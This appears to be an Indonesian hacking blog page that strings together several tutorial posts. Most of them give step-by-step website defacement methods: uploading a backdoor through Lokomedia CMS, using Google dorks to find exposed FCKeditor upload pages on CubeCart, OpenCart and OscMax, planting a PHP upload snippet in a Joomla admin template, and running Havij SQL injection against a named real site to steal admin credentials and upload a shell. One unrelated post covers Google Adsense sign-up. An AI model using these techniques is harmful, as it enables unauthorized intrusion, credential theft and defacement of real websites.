Deface Website Dengan Metode Bug's CMS Lokomedia

Oke langsung saja yaa sob (^_^)
 

Dork : allinurl:media.php?module=berita

Pilih suatu web yang menurut anda bisa di deface dengan lokomedia.

http://www.target.com/admin/content.php?module=banner

Langsung ganti url web target nya menjadi sperti berikut :

http://www.target.com/admin/modul/mod_banner.php

Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :

./aksi.php?module=banner&act=input

Kemudian ganti dengan

http://www.target.com/admin/aksi.php?module=banner&act=input

Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki. Selanjutnya tinggal lihat hasil nya di :

http://www.target.com/admin/foto_berita/shell.php

Setelah itu terserah kreasi anda sendiri yang mempunyai backdoor menjadi hak utuh milik anda , kami hanya share ilmu yang kami tahu dan tidak untuk membahayakan dan merugikan pihak lain bahkan resiko anda sendiri yang menanggungnya. Dan Untuk admin website Lokomedia saya harapkan untuk menutup bugs tersebut agar website anda aman dari serangan defacer yang banyak di dunia maya ini. Semoga Bermanfaat untuk anda semua sob (^_^)

Read More

Deface website dengan teknik FckEditor

Deface website dengan teknik FckEditor ini adalah teknik yang paling mudah dalam mendeface sebuah website
Teknik deface Fck Editor dibagi menjadi 4 yaitu :

1. Powered CubeCart

Adalah module Deface Upload file, kita bisa menggunakan cara ini.

Dork    : Powered By CubeCart V 3.0

Exploit :  /admin/includes/rte/editor/filemanager/browser/default/connectors/test.html

Contoh: www.target.com/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html

2. Powered By OpenCart

Dork   :  Powered By OpenCart

Exploit:  admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

Contoh : www.target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

3. Powered By OscMax V 2.0

Dork    : Powered By OscMax V 2.0

Exploit : FCKeditor/editor/filemanager/browser/default/connectors/test.html

Contoh ;www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

4. Hacking TXt.

Hacking Txt ini sama saja dengan Konsep 3 di atas it, cuma bedany khusus fiile txt saja yg bisa di upload, bentuk file lain tdk akan mnerima  

Dork   : Inurl:/FCKeditor/editor/filemanager/

Exploit : /FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

dengan mencarinya dengan google dork atau mengexploit urlnya langsung ( tidak semua website support dengan cara fck editor sebaiknya anda mencarinya dengan google dork saja )

Jika sudah ketemu url target maka akan muncul tampilan seperti  ini.

• Ganti connectornya menjadi PHP
• Klik choose file sesuai jenis website jika opencart anda bisa upload file html tetapi jika bukan biasanya hanya bisa upload file txt
• Klik Upload
• Jika berhasil maka akan muncul pesan "File Upload No Error"
• Klik Get folder untuk mendapatkan URL file yang di Upload

Belajar Hacking memang gampang-gampang susah sob (^_^)

Read More

Cara Daftar Google Adsense Indonesia Agar Cepat Diterima

Google Adsense adalah salah satu program PPC (Pay Per Click) yang paling banyak digemari oleh publisher Indonesia untuk memonetize situs mereka. Sejak Google Adsense mendukung website berbahasa Indonesia tahun 2012 yang lalu, banyak sekali blogger Indonesia yang mendaftarkan blog mereka di Google Adsense. Sayangnya, untuk menjadi member dan mendapatkan penghasilan dari Google Adsense itu bukan hal yang mudah. Bahkan ada yang kesulitan tentang cara daftar Google Adsense, padahal sebenarnya cara mendaftar di program PPC Google ini tidak sulit juga sih.

Banyak blogger yang sudah mendaftar, namun tidak semua diterima menjadi publisher di Google Adsense. Ini karena  website atau blog yang didaftarkan tidak memenuhi kriteria yang diharapkan oleh Google. Pihak Google Adsense menginginkan website/ blog yang menjadi publisher mereka adalah situs-situs yang berkualitas dan memenuhi aturan (TOS) mereka.

Kalau dulu, cara daftar Google Adsense itu sangat mudah. Tapi seiring pertumbuhan dan perkembangan internet, Google Adsense sudah melakukan banyak perubahan pada layanan mereka dan disesuaikan dengan perkembangan yang ada. Membuat sebuah blog ala kadarnya dan diisi dengan konten yang sangat “dangkal”, lalu mendaftarkannya di Google Adsense adalah sebuah tindakan yang sia-sia karena pasti tidak akan diterima.

Artikel terkait: $100 per hari dari Google Adsense, mau?

Lalu bagaimana cara mendaftar Google Adsense agar cepat diterima? Keunikan, nilai jual, dan originalitas sebuah website adalah syarat yang sangat penting agar diterima oleh Google Adsense. PPC ini adalah program periklanan yang sama halnya dengan program periklanan lainnya. Mereka tentunya menginginkan website yang menayangkan iklan mereka bisa memberikan promosi atau pemasaran yang baik bagi para pengiklan. Sebenarnya proses mendaftarnya sangat mudah, tapi untuk bisa diterima pada program PPC Google ini, Anda harus memperhatikan beberapa hal penting.

Pelajari lebih lanjut cara mendaftar di Google Adsense

Sebelum mendaftar, sebaiknya Anda memperhatikan beberapa hal penting berikut ini agar peluang diterima lebih besar:

1. Membuat Konten Yang Unik di Situs Anda

Seperti yang sudah disebutkan sebelumnya, originalitas sebuah ide atau konten di dalam website Anda adalah nilai penting bagi Google Adsense. Mereka memperhatikan apakah konten di dalam sebuah website bermanfaat bagi orang lain atau tidak.

Sebenarnya konten-konten di internet itu banyak yang membahas topik yang sama. Namun, cara penyajiannya atau cara penulisannya yang berbeda. Misalnya, Anda menulis tentang “cara menanam bunga Mawar”, tentunya ada banyak konten di situs lain yang membahas tentang ini. Namun, cara menuliskan konten dan cara menyajikannya di blog Anda pasti berbeda dengan konten di blog orang lain. Nah, kalau konten Anda adalah hasil copy paste dari sumber lain, kemungkinan besar situs Anda tidak akan disetujui untuk ikut program PPC Google Adsense.

2. Perhatikan Umur Situs Yang Didaftarkan

Sebaiknya jangan terlalu terburu-buru untuk mendaftarkan blog Anda untuk Google Adsense karena mereka memperhatikan umur website, jumlah konten, jumlah pengunjung, page view, dan lain-lain. Bila Anda saat ini memiliki blog yang sudah berumur 6 bulan, sudah diisi banyak konten, dan memiliki unique visitor yang stabil, ini bisa meyakinkan pihak Google Adsense bahwa blog Anda adalah tempat yang baik untuk memasang iklan.

3. Perhatikan Jumlah Konten Di Website/ Blog Anda

Jumlah konten adalah salah satu faktor penting agar diterima di Google Adsense. Saya kurang yakin berapa jumlah konten minimun di dalam sebuah website agar bisa diterima, tapi menurut saya pribadi akan lebih mudah diterima bila website kita memiliki banyak konten. Saya pribadi menyarankan untuk membuat minimal 60 konten artikel sebelum mendaftar di Google Adsense.

Untuk situs berbentuk blog, sebaiknya Anda rajin meng-update konten di dalam blog Anda karena ini bisa mempengaruhi penilaian dari pihak Google. Blog yang sering di-update oleh pemiliknya tentunya akan memiliki peluang lebih baik diterima oleh Google Adsense dibandingkan dengan blog yang jarang sekali di-update.

Ingin menghasilkan $100 per hari dari Google Adsense? Pelajari caranya di Halaman Ini! Rahasianya adalah konsisten dan persisten dalam membangun konten website Anda!

4. Gunakan Blogger.com atau YouTube.com

Nah, ini sangat penting untuk kita perhatikan. Jika Anda sudah memiliki domain dan hosting sendiri, maka peluang untuk diterima oleh Google Adsense akan lebih besar, tentunya dengan memperhatikan poin-poin sebelumnya. Namun, jika Anda ingin menggunakan domain & hosting gratis, dan ingin menjadi publisher Google Adsense, maka sebaiknya Anda menggunakan Blogger.com.

Google Adsense tidak bisa dipasang pada blog yang dibuat dengan WordPress.com, baik itu subdomain di WordPress ataupun domain sendiri yang menggunakan free hosting di WordPress. Ini adalah kebijakan (TOS) dari pihak WordPress.com sendiri, bisa dibaca Di SINI. Blogger.com adalah layanan blog gratis yang diberikan oleh pihak Google. Tentunya ini keuntungan tersendiri bagi mereka yang menggunakannya karena selama ini pihak Google selalu memberikan kesempatan pada para pengguna Blogger.com untuk memonetize blog mereka dengan program Google Adsense.

Jika Anda tidak ingin membuat blog, masih ada cara lain, yaitu melalui YouTube.com. Tentunya Anda harus punya beberapa konten video original yang di-upload ke YouTube.com. Video ini harus memiliki views yang cukup banyak agar bisa diterima di program Google Adsense.

5. Informasi Pendukung

Ada baiknya situs Anda dilengkapi dengan halaman informasi pendukung, misalnya halaman About, Privacy Policy, Kontak, TOS. Ini akan membuat situs Anda terlihat serius dan memperhatikan pengunjung blog Anda.

Pelajari lebih lanjut cara mendaftar di Google Adsense

Konten yang Anda buat tidak harus “luar biasa” agar diterima oleh Google Adsense. Yang terpenting adalah menyajikan konten yang bermanfaat bagi orang lain dan tentunya ditulis dengan cara yang unik, bukan hasil meng-copy konten orang lain. Ada banyak blogger yang memiliki penghasilan rutin dari iklan Google Adsense di blog mereka, mulai dari ratusan hingga ribuan dollar per bulan. Nah, kalau Anda ingin memonitize website/ blog Anda dengan cara memasang iklan, Google Adsense salah satu program PPC yang harus Anda pertimbangkan.

Read More

Cara memasang shell di Joomla

Cara memasang shell di Joomla - Bagaimana cara menebas index di web joomla? ada dua cara untuk menebas index di web joomla. yang pertama ke template manager lalu ganti script web tersebut dengan sript deface kamu. yang kedua dengan memasang shell lalu tebas index.php nya. Dan kali ini saya akan menjelaskan cara yang kedua, yaitu cara menanam/memasang shell di web Joomla.

Bahan:
Shell (Download Here)
Shell ( Download Here )

Langkah-Langkah:
1. Login ke halaman Administrator ( site.com/administrator ).
*Tulisan berwarna merah, ganti dengan alamat web joomla yang akan ditanam shell.

2. Klik menu Template Manager yang terdapat di halaman utama.

3. Lihat Template Administrator yang aktif ( Yang aktif terdapat tanda bintang ). lalu klik tombol Templates.

4. Klik pada judul Template Administrator yang aktif tadi.

5. Klik pada tulisan Edit Main Page Templates.

6. Taruh Script ini di bawah Script halaman Administrator. dan save.

echo '

';
echo '

';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload Sukses!!!

'; }
else { echo 'Gagal Upload!!!

'; }
}
?>

7. Setelah Save berhasil, akan muncul fasilitas untuk mengupload shell. ( terdapat di paling bawah halaman administrator ). Lalu pilih file shell kamu.

8. Setelah Shell dipilih. Klik pada tombol Upload.

*jika berhasil, akan ada tulisan Upload Sukses !!!

9. Masuk ke dalam shell kamu ( site.com/administrator/Nama shell kamu.php ) Lalu cari tulisan index.php dan klik pada tombol edit
*Tulisan berwarna merah harus di ganti.

10. Hapus semua script dan tempel script kamu. Lalu klik tombol save.

*Jika sudah berhasil, akan muncul tampilan script deface anda

Jika ingin masuk ke dalam shell kamu lagi. tinggal tulis url site.com/administrator/nama shell kamu.php

Read More

Cara Deface Website Dengan Havij

Cara Deface Website Dengan Havij

Cara Deface Website Dengan Havij- Havij adalah Tools SQL Ijection yang dibuat untuk mempermudah mencari bug/celah pada suatu website dan tools ini sudah teruji di ITB dan IPB wkwk , Tools ini banyak digunakan oleh Attacker Newbie maupun Expert karena cukup mudah dan tanpa harus melakukan selection kode .

Perlu diketahui juga bro SQL Injection adalah tehnik meretas Website dengan menggunakan celah Query/String pada suatu Website Dan tingkat kerusakan biasanya sangat tinggi karena para Attacker dapat mengetahi bakan merubah isi dari DB ( DataBase ) suatu Website yang menjadi korban mereka.

Sebelum melakukan Tutorial Bahan Bahan Yang Diperlukan Adalah :
[+] Download Havij 1.16 Pro
      Pass = bangzendy
[+] Dork SQLInjection / Havij Lengkap 

 Cara Deface Website Dengan Havij

1. Pertama Silahkan Lo cari Web Target Menggunakan Dork Google Dan gue milih web www.lis.co.th

2. Buka Webnya maka akan seperti itu dan lihat linknya

3. Sekarang kita lihat webnya ada bug atau tidak tambahkan string (') tanpa tanda kurung di akhir link web klik gambar untuk perbesar nah jika keluar pesan erro unkown my sql bla bla itu berarti vuln nah bukan berarti bisa di inject tapi kemungkinan bisa , dan web dibawah ini kebetulan bisa diinject

4. Kalau sudah menemukan target vuln  silahkan buka havij dan masukan web nya sepert gambar dibawah jangan lupa hapus string (') dan klik analyze tunggu sampai keluar tulisan I'am Idle di status target

5. langkah selanjutnya Klik Tables > Klik centang pada lis_db > lalu klik Get Tables seperti dibawah maka akan keluar lagi data datanya

6. pilih table yang berhubungan dengan user admin , kali ini saya coba memilih table acc_db

centang table dan klik pada menu get columns, langakah selanjutnya centang acc_user dan acc_pwd lalu klik pada menu get data

7. nah , di dalam table acc_db ternyata terdapat kolom acc_user dan acc_pwd , user inilah yang kita gunakan untuk masuk ke sebuah web menggunakan akses admin

8. Akhirnya lo dapet User Passwot adminnye wkwk nah selanjutnya lo cari admin loginnya pilih > Find Admin seperti gambar dibawah

9. Nah Bray sekarang kita dapet admin Login nya yang beralamatkan www.lis.co.th/admin sekarang dibuka dan masukan user password yang telah lu dapat seperti dibawah

10. Akhirnya lu berhasil masuk ke dalam website tersebut dan silahkan mau ngapain lo disana mau dikasih tau adminnya mau nangis mau tanem taneman sayur basing lu dosa lu yang nanggung wkwk

11. Nah Disini lu saatnya Uploud Shell menggunakan Temper Data Selesai.

Sekian Tutorial Cara Deface Website Dengan Havij semoga bermanfaat untuk anda Jika tutorial diatas masih kurang jelas silahkan budayakan bertanya di komentar dan kami tidak bertanggung jawab atas apa yang anda lakukan ini hanyalah materi pembelajaran , jika ada web orang lain diretas oleh anda kami tidak bertanggung jawab dan dosa anda sendiri yang menanggungnya sekian dan terima kasih

Read More